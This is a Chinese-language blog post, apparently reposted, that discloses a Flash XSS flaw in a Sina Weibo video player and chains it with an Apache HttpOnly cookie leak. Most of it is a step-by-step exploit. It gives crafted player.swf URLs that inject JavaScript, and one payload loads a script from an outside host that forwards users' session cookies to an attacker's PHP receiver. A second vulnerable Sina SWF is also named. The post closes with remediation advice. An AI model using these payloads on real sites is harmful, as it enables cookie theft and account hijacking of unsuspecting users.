也想出现在这里? 联系我们

新浪微博COOKIES盗取[flash编程安全+apache http-only cookie 泄漏利用]

作者 : 小编 本文共3053个字,预计阅读时间需要8分钟 发布时间: 2021-06-20 共5.09K人阅读
也想出现在这里? 联系我们

最近突然觉得,很多FLASH开发人员在编写的时候,忽视了安全问题。被恶意利用的话,可以实现URL跳转,COOKIES盗取,甚至是蠕虫攻击。漏洞测试:IE , firefox , chrome(= = 这个输入测试代码,浏览器直接崩溃了)漏洞成因:1. 首先说的是FLASH编程安全问题:一些编程人员,对于loaderInfo.parameters 所传入的参数都不会严格过滤,甚至很多开发人员都有把Javascript函数名作为参数传入的习惯。而事实证明,新浪的开发人员也有类似的习惯。2. 首先google 了一下inurl:(swf) site:weibo.com ,将搜索结果中的SWF全部下载下来。 用ASV全部反编一下,得到若干txt文件,每个FLASH一个。3. 漏洞利用条件: 有parameters, 有ExternalInterface.call。 我们以此2个关键词搜索上面得到的txt文件。4. 最终锁定一个目标。http://tw.weibo.com/_common/jwplayer/player.swf5. 其漏洞源码如下:

复制代码

代码如下:

//加载外部参数this.loadFlashvars(RootReference.root.loaderInfo.parameters);//写入参数this.setConfigParam(param, params[param]);//继续,可以看到参数写到了_config 里this._config[_arg1.toLowerCase()] = Strings.serialize(Strings.trim(_arg2));//再搜索ExternalInterface.call,找到以下位置var callbacks:* = (_player.config.playerready) ? ((_player.config.playerready + \”,\”) + \”playerReady\”) : \”playerReady\”; if (ExternalInterface.available){ for each (callback in callbacks.replace(/\\s/, \”\”).split(\”,\”)) { try { ExternalInterface.call(callback, {id:evt.id, client:evt.client, version:evt.version}); } catch(e:Error) { }; }; clearQueuedEvents(); };

//可以看出call<–callback<–callbacks<—_player.config.playerready6. 基于以上分析,我们可以很容易构造出利用代码。http://tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){alert(\’xxx\’);})7. 但是这样的代码,还不足以构成危害。 顶多就是一个URL跳转。 连cookies都是获取不到的。如以下代码,将返回[拒绝访问]的错误。http://tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){try{alert(document.cookie)}catch(e){alert(e.description)}})8. 突破限制,获取cookies。正好昨天在百度javascript吧看到一片帖子href,src的妙用(http://tieba.baidu.com/p/1583718448)。正好拿来突破这种限制了。(广告一下,喜欢javascript的可以经常来玩玩!!)。利用文章中所讲技巧,构造以下代码:http://tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){location.href=\’javascript:"<script>alert(document.cookie)</script>"\’})9. 从上面可以看出,弹出weibo.com的cookies里。但是当我拿这个cookies来发送微博的时候,发现不成功。 比较了一下获取的cookies,发现SUS,SUE两个值是http-only的,也就是document.cookie得不到的。10. 前些天看到有人发腾讯的apache cookie 泄漏漏洞,结果因为没有漏洞利用场景被忽略了。看了下tw.weibo.com的HTTP头,正好是apache的,我们这里可以尝试用一用了!!从exploit-db下载了利用的JS,做了点小修改。如下,保存为http://appmaker.sinaapp.com/test3.js11. 构造以下利用代码,调用上面这个JS文件。代码中的test.php为接收cookies的文件。http://tw.weibo.com/_common/jwplayer/player.swf?playerready=(function(){location.href=\’javascript:"<script/src=\\\’//appmaker.sinaapp.com\\/test3.js\\\’></script>"\’})编码一下,可以发到微博:http://tw.weibo.com/_common/jwplayer/player.swf?playerready=(function()%7Blocation.href%3D\’javascript%3A%22%3Cscript%2Fsrc%3D%5C\’%2F%2Fappmaker.sinaapp.com%5C%2Ftest3.js%5C\’%3E%3C%2Fscript%3E%22\’%7D)12. 结果表明该服务器存在apache cookies泄漏漏洞,效果见漏洞证明。————————————————————总结:1. FLASH的编写安全不容忽视,实际上,我找到了10多个FLASH中,有2个FLASH可以被利用到。这说明这种漏洞不是偶然,而是被开发者忽略掉的一个问题。另外一个不在weibo.com的域名下。提供给你们一起修复下吧!http://js.t.sinajs.cn/t4/home/static/swf/img/SinaCollage.swf?JSHandler=(function(){alert(\’xxx\’)})2. 本流程为apache cookies泄漏漏洞的利用,提供了一个利用场景。漏洞证明:1. 微博写入链接:2. 点击链接后,抓包,见图A. Apache cookies 泄漏图,其中包含有document.cookie无法获取到的SUS,SUEB. 可以看到Cookies被转发到我们指定的PHP文件中。3. 利用Cookies在SAE发送微博失败。。 提示是“抱歉,你当前使用的账号、IP或应用由于违反了新浪微博的安全检测规则,暂时无法完成此操作啦。你可以绑定手机来取消此限制,如有问题@微博客服反馈。” 可能做了某些其他限制。修复方案:1. 审查已上线的FLASH文件代码,严格控制FLASH文件参数的输入2. apache的漏洞给打补丁。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 新浪微博COOKIES盗取[flash编程安全+apache http-only cookie 泄漏利用]

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录